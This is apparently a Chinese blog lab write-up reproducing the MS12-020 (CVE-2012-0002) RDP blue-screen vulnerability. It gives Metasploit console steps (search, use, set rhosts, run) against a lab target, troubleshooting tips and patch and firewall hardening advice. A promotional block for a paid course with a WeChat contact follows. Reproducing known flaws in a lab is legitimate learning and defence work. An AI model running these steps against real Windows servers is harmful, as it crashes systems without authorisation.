蓝屏攻击CVE-2012-0002漏洞复现(MS12-020)

use 1 ##使用第一个模块
set rhosts ##设置目标IP
run ##执行

搜索漏洞编号,利用。

search ms12-020
use 0

查看,设置必须参数

show options

set rhosts 192.168.137.127

开始使用验证模块对目标靶机进行验证,是或否存可利用该漏洞

run

这里提示靶机的确存在该漏洞,可以进行漏洞利用。

退出当前漏洞验证模块,使用攻击载荷模块。

back 1
use 1

还是看参数,设置参数。

show options
set rhosts 192.168.137.127

执行

run

执行成功结果:

靶机桌面:

漏洞复现结束。

没有成功的原因分析(不一定完全)

靶机设置

需要开启远程桌面服务,Windows server系统需要在服务器面板添加角色中安装远程桌面服务,在同意允许他人远程协助本机即可。

防火墙如果进行过加固练习,需要还原防火墙设置或关闭防火墙

攻击机设置

一般是端口占用,在msf操作台更换服务端的端口即可(msf模块默认都是用4444端口),

set lport 4433 ##设置一个没有被占用的端口即可

可能遭受蓝屏攻击的范围

windows xp 、2003、2008,该漏洞针对于3389的远程桌面服务,并不是操作系统。

安全加固方案

打补丁(来自微软官方发布)

及时下载来自微软官方发布的补丁包>>>>点此跳转<<<<

手工加固(短时间)
  1. 设置防火墙禁用端口或者关闭远程桌面
  2. 若需使用,对防火墙配置策略,允许白名单IP访问远程桌面。
来自微软官方的建议:

解决方法是指设置或配置更改,该设置或配置更改不会纠正基础漏洞,但有助于在应用更新之前阻止已知的攻击途径。 Microsoft 测试了以下解决方法,并在讨论中指出解决方法是否降低了功能:

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

5d8cd42.png#pic_center)

因篇幅有限,仅展示部分资料

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-P3sDu3xc-1712647372836)]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值